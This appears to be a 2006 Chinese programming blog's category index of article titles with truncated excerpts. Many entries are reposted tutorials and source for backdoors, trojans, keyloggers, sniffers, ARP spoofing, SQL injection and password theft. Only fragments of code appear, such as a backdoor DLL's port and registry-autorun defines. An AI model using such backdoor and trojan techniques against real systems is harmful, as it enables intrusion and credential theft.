编程技术
文章平均质量分 77
netwindmiss
这个作者很懒,什么都没留下…
展开
-
可以杀任何进程的代码
#include #include BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp; LUID luid; if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) { printf(" Loo转载 2006-03-13 21:16:00 · 744 阅读 · 0 评论 -
一个简单的CMDSHELL后门
一个简单的CMDSHELL后门转载 2006-04-24 19:04:00 · 950 阅读 · 0 评论 -
五个反弹后门的源代码
五个反弹后门的源代码[转]iceworld @ 2005-11-9 6:04:08作者:anmeihong#sina.com 来源:blog.csdn.net/amh/ 第一个反弹木马代码:作者 iceblood 代码 #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude void usage();转载 2006-04-24 19:00:00 · 1797 阅读 · 1 评论 -
后门程序BDoor源码
// BDoor.cpp : Defines the entry point for the DLL application.//#include "stdafx.h"#include "winsock2.h"#pragma comment(lib,"ws2_32")#define PORT 5010#define REG_RUN "SOFTWARE//Microsoft//Windo转载 2006-04-24 18:58:00 · 889 阅读 · 0 评论 -
基于ICMP的木马的编写
基于ICMP的木马的编写 作者:不详 来源于:木马帝国 发布时间:2005-3-12 21:52:06 本文会详细的分析Win2000下一种新型木马的内部构造和防御方法。(本文默认的操作系统为Win2000,开发环境为VC++6.0。) 大家知道,一般的"古典"型木马转载 2006-04-24 18:46:00 · 908 阅读 · 0 评论 -
编写漏洞扫描器
编写漏洞扫描器 一、漏洞扫描器基本原理:编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在,它的socket建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描器通常使用8转载 2006-04-22 10:28:00 · 1035 阅读 · 0 评论 -
Code--Synscan(扫描器代码)
Code--Synscan(扫描器代码) Red Hat Linux release 8.0 (Psyche)Kernel 2.4.18-14 on an i686login: LovePa转载 2006-04-22 10:25:00 · 1219 阅读 · 0 评论 -
端口截听实现端口隐藏,嗅探与攻击
端口截听实现端口隐藏,嗅探与攻击在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);saddr.sin_family = AF_INET;saddr.sin_addr.s_addr = htonl(INADDR_ANY); bind(s,(SOCKADDR *)&saddr,sizeof(转载 2006-04-22 09:52:00 · 753 阅读 · 0 评论 -
DLL木马的原理
DLL木马的原理 DLL木马的实现原理是编程者在DLL中包含木马程序代码,随后在目标主机中选择特定目标进程,以某种方式强行指定该进程调用包含木马程序的DLL,最终达到侵袭目标系统的目的。 正是DLL程序自身的特点决定了以这种形式加载木马不仅可行,而且具有良好的隐藏性: (1)DLL程序被映射到宿主进程的地址空间中,它能够共享宿主进程的资源,并根据宿主进程在目标主机的级别非法访问相应的系统资转载 2006-04-22 10:50:00 · 2097 阅读 · 1 评论 -
五个反弹后门的源代码
五个反弹后门的源代码[转]iceworld @ 2005-11-9 6:04:08作者:anmeihong#sina.com 来源:blog.csdn.net/amh/ 第一个反弹木马代码:作者 iceblood 代码 #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude void usage();转载 2006-04-24 19:00:00 · 913 阅读 · 0 评论 -
socket编程例子:TCP Shell后门
socket编程例子:TCP Shell后门http://sinbad.zhoubin.com 作者: 不详 很简单很容易被发现,且当作socket编程例子学习吧。 /*========================转载 2006-04-24 19:03:00 · 922 阅读 · 0 评论 -
自愉自乐的小程序
#include #include #include typedef struct{ char l; //左半字符 char r;//右半字符}hz;void main(int argc,char **argv){ FILE *p; FILE *p1; int i; hz h[100]; if(argc { printf("useage:please enter the file name原创 2006-08-25 01:42:00 · 844 阅读 · 0 评论 -
vc 画图与打印 学习笔记
//得到显示分辨率CDC* pddc = GetDC();int ixd=pddc->GetDeviceCaps(LOGPIXELSX);int iyd=pddc->GetDeviceCaps(LOGPIXELSY);//一英寸约等于25.4mm,在MM_LOMETRIC下的逻辑单位为0.1mmint scaleX = 25.4*10/ixd;//x方向每个像素点表示的0.1mm数int scal转载 2006-12-18 20:38:00 · 1491 阅读 · 0 评论 -
利用DelayLoad来优化应用程序的性能,拦截API.
利用DelayLoad来优化应用程序的性能,拦截API. 在 1998年12月的MSJ出版刊物中, Jeffrey和我写了关于 在 vc6中使用DelayLoad 功能的专栏.最终结果,是证明了它是多么cool.但是,不幸的是,还有很多人不了解DelayLoad,他转载 2006-05-07 17:20:00 · 941 阅读 · 0 评论 -
劫持WSAAccept()实现无端口后门
劫持WSAAccept()实现无端口后门分类:网络技术 #blogIndex .entry-body p{ text-indent:0; line-height:25px; } 随着网民安全意识的日益提高,现在找个安全隐蔽饿后门是越来越难了。用现成的固然省事,但无奈前有防火墙的堵截、后有杀毒软转载 2006-05-05 17:21:00 · 1385 阅读 · 0 评论 -
端口复用技术与实现代码
function StorePage(){d=document;t=d.selection?(d.selection.type!=None?d.selection.createRange().text:):(d.getSelection?d.getSelection():);void(keyit=window.open(http://www.365key.com/storeit.as转载 2006-04-28 09:25:00 · 984 阅读 · 0 评论 -
管道学习--XFreeBOY
管道学习--XFreeBOY2005年12月27日14:02星期二 [VC] 操作系统的实验要用到管道.管道(Pipe)实际是用于进程间通信的一段共享内存,创建管道的进程称为管道服务器,连接到一个管道的进程为管道客户机。一个进程在向管道写入数据后,另一进程就可以从管道的另一端将其读取出来。匿名管道(An转载 2006-04-25 11:11:00 · 1090 阅读 · 0 评论 -
Windows管道技术
不知你是否用过这样的程序,他们本身并没有解压缩的功能,而是调用DOS程序PKZIP完成ZIP包的解压缩。但是在程序运行时又没有DOS控制台的窗口出现而且一切本应该在DOS下显示的信息都出现在了那个安装程序的一个文本框里。这种设计既美观又可以防止少数眼疾手快的用户提前关了你的DOS窗口。现在就来讨论一下,如何用匿名管道技术实现这个功能。管道技术由来已久,相信不少人对DOS命令里的管道技术最为熟悉。当转载 2006-04-25 11:04:00 · 743 阅读 · 0 评论 -
tini2后门代码
tini2后门代码 2004-10-16 hss001 点击: 134转载 2006-04-24 19:08:00 · 946 阅读 · 0 评论 -
再谈利用ARP欺骗实现嗅探
再谈利用ARP欺骗实现嗅探设有主机A、B、C在同一个局域网中,且网关为G。A,C为要监听的主机,B为我们的机器。目前的大多数工具的实现是欺骗A和与A通信的主机C对方的MAC均为B,这样就可以监听它们的通信。但是实际上大多数情况下,我们感兴趣的是A与网关G的通信,而其中又尤其对A发出的一些信息感兴趣转载 2006-04-22 10:07:00 · 1084 阅读 · 0 评论 -
如何在win 2003中得到登陆密码
如何在win 2003中得到登陆密码 [ 作者:迷路s blog 转贴自:迷路s blog转载 2006-04-22 09:51:00 · 731 阅读 · 0 评论 -
木马是如何编写的
木马是如何编写的 http://www.fineacer.com/Article_Show.asp?ArticleID=317转载 2006-04-22 10:02:00 · 1215 阅读 · 0 评论 -
网络编程学习--简单的端口扫描
#include #include // 编译时需使用的库 #pragma comment(lib,"wsock32.lib") int main(int argc, char *argv[]) { WSADATA wsadata; int sock; int port=0; struct sockaddr_in server; char *ip=argv[1]; // 创建一个so原创 2006-04-20 21:57:00 · 944 阅读 · 0 评论 -
Socket编程相关数据类型定义
Socket编程相关数据类型定义2006-03-28 来源: 网友推荐 责编: 李晓捷 作者: 编者按:计算机数据存储有两种字节优先顺序:高位字节优先和低位字节优先。Internet上数据以高位字节优先顺序在网络上传输,所以对于在内部是以低位字节优先方式存储数据的机器,在Internet上传输数据时就需要进行转换。 我们要讨论的第一个结构类型是:s转载 2006-04-20 21:27:00 · 725 阅读 · 0 评论 -
Lion写的端口扫描工具
/* ===================HUC Command line PortScanner V0.2 ================== =================By Lion, 2002. http://www.cnhonker.net================ */ #include #include // 编译时需使用的库 #pragma commen转载 2006-04-20 20:42:00 · 1659 阅读 · 0 评论 -
用VC++写的远程线程插入代码
#include#include #include #pragma comment(lib,"Shlwapi.lib")//参数结构 ; typedef struct _RemotePara{ DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress;}Rem转载 2006-04-14 10:19:00 · 1555 阅读 · 0 评论 -
汇编指令集
一、数据传输指令 ─────────────────────────────────────── 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. 1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. MOVZX 先零扩展,再传送. PUSH 把字压入堆栈. POP 把字弹出堆栈. PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.转载 2006-03-31 22:24:00 · 1926 阅读 · 0 评论 -
acsess sql injection code by c
//4月20日修改,代码可能比较不规范,没加注释!#include #include #include #include #include #include #pragma comment(lib, "wininet.lib")typedef struct{ //字段的结构 char *name; //字段名 DWORD len; //值长度 char *dic; //字典 c原创 2006-03-31 22:18:00 · 866 阅读 · 0 评论 -
打印可执行程序二进制码
//打印16进制#include #include int main(int argc,char **argv) { HANDLE hFile; DWORD dwSize,dwRead,dwIndex=0,i; unsigned char *lpBuff=NULL; __try { if(argc!=2) { printf(" Usage: %s ",argv[0]);转载 2006-03-13 22:03:00 · 682 阅读 · 0 评论 -
从编程角度来看IPC$空连接的利用和防范
前言 我们知道,一般的攻击行为的首要步骤是收集目标的系统信息,对于NT/2K/XP系统而言,最简单的收集方法就是利用IPC$空连接。本文从原理入手介绍IPC$,并从编程的角度来看如何利用它,最后介绍一些简单的防范。本文要求读者有一定编程和C的基础,对网络知识有所了解。 我会收集一些常用的IPC$转载 2006-04-22 10:08:00 · 2701 阅读 · 0 评论 -
浅析”流光种植者”的编程实现
浅析”流光种植者”的编程实现我们在获取了远程主机管理员权限的帐号和密码之后,往往会想办法为自己留一个后门,这就不得不在远程主机上启动我们的后门程序。通常的做法是用一系列的命令来实现。关于IPC$的入侵教程在网上已是一大堆,但这些命令使用起来未免过于烦琐。流光的种植者为我们提供了一个自动在远程主机上转载 2006-04-22 10:10:00 · 911 阅读 · 0 评论 -
WIN2K命令行Sniffer的源码
WIN2K命令行Sniffer的源码 以下是为代码:#include #include #include #include "mstcpip.h" #pragma comment(lib,"WS2_32.lib") #define STATUS_FAILED 0xFFFF //定义异常出错代码 #define MAX_转载 2006-04-22 09:49:00 · 862 阅读 · 0 评论 -
一个包含详细注释的扫描器C源代码
#include #include #include #define iPort 80//目标Web Server端口 #define szSign "500 13/r/nServer: Microsoft-IIS/5.0"//根据此标志来检查目标是否有漏洞 #pragma comment(lib,"ws2_32.lib") /////////////////////////////////转载 2006-04-22 09:45:00 · 748 阅读 · 0 评论 -
编写漏洞扫描器
编写漏洞扫描器 一、漏洞扫描器基本原理:编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在,它的socket建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描器通常使用8转载 2006-04-22 10:28:00 · 1144 阅读 · 0 评论 -
程序的自删除
程序的自删除已经不是什么新鲜的话题了,它广泛运用于木马、病毒中。试想想,当你的程序还在运行中(通常是完成了驻留、感染模块),它就自动地把自己从磁盘中删掉,这样一来,就做到了神不知鬼不觉,呵呵,是不是很cool呢?自删除(Self Deleting)最早的方法是由 Gary Nebbett 大虾写的转载 2006-04-22 10:12:00 · 1098 阅读 · 0 评论 -
VC++编程实现网络嗅探器
VC++编程实现网络嗅探器引言 从事网络安全的技术人员和相当一部分准黑客(指那些使用现成的黑客软件进行攻击而不是根据需要去自己编写代码的人)都一定不会对网络嗅探器(sniffer)感到陌生,网络嗅探器无论是在网络安全还是在黑客攻击方面均扮演了很重要的角色。通过使用网络嗅探器可以把网卡设置于混杂模式,并可实现对网络上传输的数据包的捕获与分析。此分析结果可供网络安全分析之用,但如为黑客所利用也可以转载 2006-04-22 10:09:00 · 2301 阅读 · 0 评论 -
手把手教你做键盘记录器
文章作者:小珂[EST-EvilOctal Security Team]信息来源:中国 邪恶八进制(www.EvilOctal.com)文章版权:版权归黑客基地所有前几天写了一篇键盘记录器,好多人反映看不懂,对新人没什么用处,所以且这篇我会写的很详细,再也不像那篇,出了代码什么也没 ^!^这个程序将会详细的讲解如何记载键盘的每一次输入。下面介绍的这个程序主要是利用GetAsyncKeyStat转载 2006-04-22 09:55:00 · 1709 阅读 · 0 评论 -
20个VC开发小技巧
20个VC开发小技巧//一、打开CD-ROMmciSendString("Set cdAudio door open wait",NULL,0,NULL);//二、关闭CD_ROMmciSendString("Set cdAudio door closed wait",NULL,0,NULL);//三、关闭计算机OSVERSIONINFO OsVersionInfo; //包含转载 2006-04-22 09:53:00 · 702 阅读 · 0 评论 -
一种新的穿透防火墙的数据传输技术
一种新的穿透防火墙的数据传输技术Author : ZwelLEmail : zwell@sohu.comDate : 2005.4.12使用该技术背景:在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么). 针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.相反,有一点我们也很清楚:被转载 2006-04-22 09:47:00 · 680 阅读 · 0 评论 -
汇编分析-改c
10001819 |. FF15 1C500210 CALL DWORD PTR DS:[; /GetPrivateProfileStringW1000181F |. 8BBC24 140800>MOV EDI,DWORD PTR SS:[ESP+814]10001826 |. 33D2 XOR EDX,EDX10001828 |. 85FF原创 2006-08-25 19:39:00 · 910 阅读 · 0 评论